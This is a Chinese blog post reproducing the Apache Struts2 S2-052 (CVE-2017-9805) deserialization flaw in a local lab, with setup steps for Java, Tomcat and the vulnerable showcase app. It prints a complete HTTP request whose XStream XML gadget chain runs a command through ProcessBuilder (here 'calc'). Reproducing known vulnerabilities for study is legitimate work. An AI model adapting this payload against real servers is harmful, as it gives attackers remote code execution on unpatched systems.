s2-052漏洞介绍
漏洞不知道是之前的,还是刚出来的,反正我是刚看到,看到就心动了,不行我也要复现漏洞,不要问我为啥有时间复现,因为我每天都很闲,很闲的.........
—————————————————————————————————————————
上面都是废话,下面才是精华呀
问题出现在struts2-rest-plugin插件XStreamHandler处理器中的toObject()方法,其中未对传入的值进行任何限制,在使用XStream反
漏洞编号:CVE-2017-9805(S2-052)
影响版本:Struts 2.5 - Struts 2.5.12
s2-052 POC
POST http://127.0.0.1:8080/struts2-rest-showcase/orders HTTP/1.1
Host: 127.0.0.1:8080
Connection: keep-alive
Content-Length: 1963
Cache-Control: max-age=0
Origin: http://127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Content-Type: application/xml
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://127.0.0.1:8080/struts2-rest-showcase/orders/new
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=1EF0BA9085CFFA2944901297746FE081
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>calc</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
s2-052漏洞复现
安装java
我是从官网上面下载的,版本是1.8.0_144
安装完之后需要配置环境变量
1 新建系统变量:
变量名:JAVA_HOME
变量值:你的JDK安装目录
2 再新建系统变量:
变量名:CLASSPATH
变量值:.;%JAVA_HOME%\lib;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar;%TOMCAT_HOME%\BIN
注意:前面的点号
3 修改PATH变量
变量名:PATH
变量值:;%JAVA_HOME%\bin;%JAVA_HOME%\jre\bin;
注意:前面的分号,将此值添加到,path变量值的最后面
安装Tomcat
在官网上下载Tomcat http://tomcat.apache.org/download-90.cgi
下载你需要的版本
下载完成以后解压到你想解压的目录就可以了,之后还需要配置环境变量
配置Tomcat的环境变量
新建Tomcat环境变量
变量名:TOMCAT_HOME
变量值:你的TOMCAT所在目录
启动Tomcat
打开bin文件夹—双击startup.bat;系统会打开一个dos窗口,即启动成功;
如果未打开dos窗口或者dos窗口一闪而过,可能是jdk的配置出错,请安装上面的进行注意检查
访问:http://127.0.0.1:8080
注意:若要修改tomcat端口,可打开/Library/Tomcat/conf/server.xml文件,修改8080端口。
下载受影响的struts2版本
1、从struts2的官网下载最后受影响的版本struts-2.5.12
地址: http://archive.apache.org/dist/struts/2.5.12/struts-2.5.12-apps.zip 注意下载struts-2.5.12-apps即可,不需要下载struts-2.5.12-all.zip。不然struts-2.5.12-all.zip中包含很多其他的东西,可以看到lib目录下有很多jar包。
2、拿到struts-2.5.12-apps之后,将其中的app目录下的struts2-rest-showcase.war文件放到webapps目录下,然后设置一下conf/server.xml文件即可。
3、这里把appBase设置为webapps目录,然后unpackWARs设置为true,这样就会自动解包xxx.war,autoDeploy也设置为true(热部署?) 然后就可以浏览器访问了。
image.png
直接输入 http://127.0.0.1:8080/struts2-rest-showcase/会跳转,然后出现下面的页面,表示测试环境搭建成功
TIM图片20180322110421.png
漏洞利用
进入编辑页面
TIM图片20180322110911.png
设置抓包,点击提交按钮
TIM图片20180322111123.png
修改Content-Type和POST提交的数据
image.png
可以看到计算器已经调用出来
TIM图片20180322111800.png
网友评论